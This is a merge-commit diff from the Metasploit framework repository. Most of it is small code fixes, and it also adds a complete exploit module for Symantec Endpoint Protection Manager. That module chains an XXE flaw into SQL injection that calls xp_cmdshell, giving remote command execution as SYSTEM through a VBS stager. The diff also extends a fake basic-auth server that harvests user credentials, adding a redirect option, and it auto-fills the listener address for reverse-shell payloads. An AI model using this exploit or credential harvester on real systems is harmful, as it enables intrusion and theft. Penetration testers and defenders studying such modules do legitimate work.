Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
f229932d16
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
# report the external port as being open
|
||||
if inside_workspace_boundary(external_address)
|
||||
if inside_workspace_boundary?(external_address)
|
||||
report_service(
|
||||
:host => external_address,
|
||||
:port => external_port,
|
||||
|
|
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
# also report its external address as alive
|
||||
if inside_workspace_boundary(external_address)
|
||||
if inside_workspace_boundary?(external_address)
|
||||
report_host(
|
||||
:host => external_address,
|
||||
:state => Msf::HostState::Alive
|
||||
|
|
|
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG'])
|
||||
end
|
||||
|
||||
if inside_workspace_boundary(external_addr)
|
||||
if inside_workspace_boundary?(external_addr)
|
||||
report_service(
|
||||
:host => external_addr,
|
||||
:port => int,
|
||||
|
|
|
@ -39,7 +39,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
|
||||
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ])
|
||||
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
|
||||
OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -73,9 +74,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
|
||||
send_not_found(cli)
|
||||
if datastore['RedirectURL']
|
||||
print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
|
||||
send_redirect(cli, datastore['RedirectURL'])
|
||||
else
|
||||
print_status("Sending 401 to client")
|
||||
send_not_found(cli)
|
||||
end
|
||||
else
|
||||
print_status("Sending 401 to client #{cli.peerhost}")
|
||||
response = create_response(401, "Unauthorized")
|
||||
response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
|
||||
cli.send_response(response)
|
||||
|
|
|
@ -0,0 +1,124 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include REXML
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
|
||||
versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
|
||||
can reach SQL injection affected components. As xp_cmdshell is enabled in the included
|
||||
database instance, it's possible to execute arbitrary system commands on the remote system
|
||||
with SYSTEM privileges.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Stefan Viehbock', # Discovery
|
||||
'Chris Graham', # PoC exploit
|
||||
'xistence <xistence[at]0x90.nl>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-5014' ],
|
||||
[ 'CVE', '2013-5015' ],
|
||||
[ 'EDB', '31853'],
|
||||
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows VBS Stager', {}]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Feb 24 2014',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9090),
|
||||
OptString.new('TARGETURI', [true, 'The base path', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Sending payload")
|
||||
# Execute the cmdstager, max length of the commands is ~3950
|
||||
execute_cmdstager({:linemax => 3950})
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
|
||||
command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
|
||||
|
||||
# Generate random 'xx032xxxx' sequence number.
|
||||
seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
|
||||
|
||||
soap = soap_request(seqnum, command)
|
||||
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
|
||||
xxe = post_data.to_s
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
|
||||
'method' => 'POST',
|
||||
'vars_get' => { 'ActionType' => 'ConsoleLog' },
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => xxe,
|
||||
})
|
||||
|
||||
if res and res.body !~ /ResponseCode/
|
||||
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
|
||||
end
|
||||
end
|
||||
|
||||
def soap_request(seqnum, command)
|
||||
randpayload = rand_text_alpha(8+rand(8))
|
||||
randxxe = rand_text_alpha(8+rand(8))
|
||||
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
|
||||
entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
|
||||
|
||||
xml = Document.new
|
||||
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
|
||||
xml.add_element("Request")
|
||||
xxe = xml.root.add_element(randxxe)
|
||||
xxe.text = "PAYLOAD"
|
||||
|
||||
xml_s = xml.to_s
|
||||
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
|
||||
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
|
||||
|
||||
xml_s
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -114,9 +114,15 @@ cmd = rest.pop.downcase
|
|||
options = {}
|
||||
rest.each do |x|
|
||||
k,v = x.split("=", 2)
|
||||
options[k] = v.to_s
|
||||
options[k.upcase] = v.to_s
|
||||
end
|
||||
|
||||
# if LHOST is not set auto set it
|
||||
if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
|
||||
options['LHOST'] = Rex::Socket.source_address
|
||||
end
|
||||
|
||||
|
||||
payload.datastore.merge! options
|
||||
|
||||
if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)
|
||||
|
|
3
msfvenom
3
msfvenom
|
@ -152,6 +152,9 @@ require 'msf/core/payload_generator'
|
|||
k,v = x.split('=', 2)
|
||||
datastore[k.upcase] = v.to_s
|
||||
end
|
||||
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
|
||||
datastore['LHOST'] = Rex::Socket.source_address
|
||||
end
|
||||
end
|
||||
|
||||
if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin
|
||||
|
|
Loading…
Reference in New Issue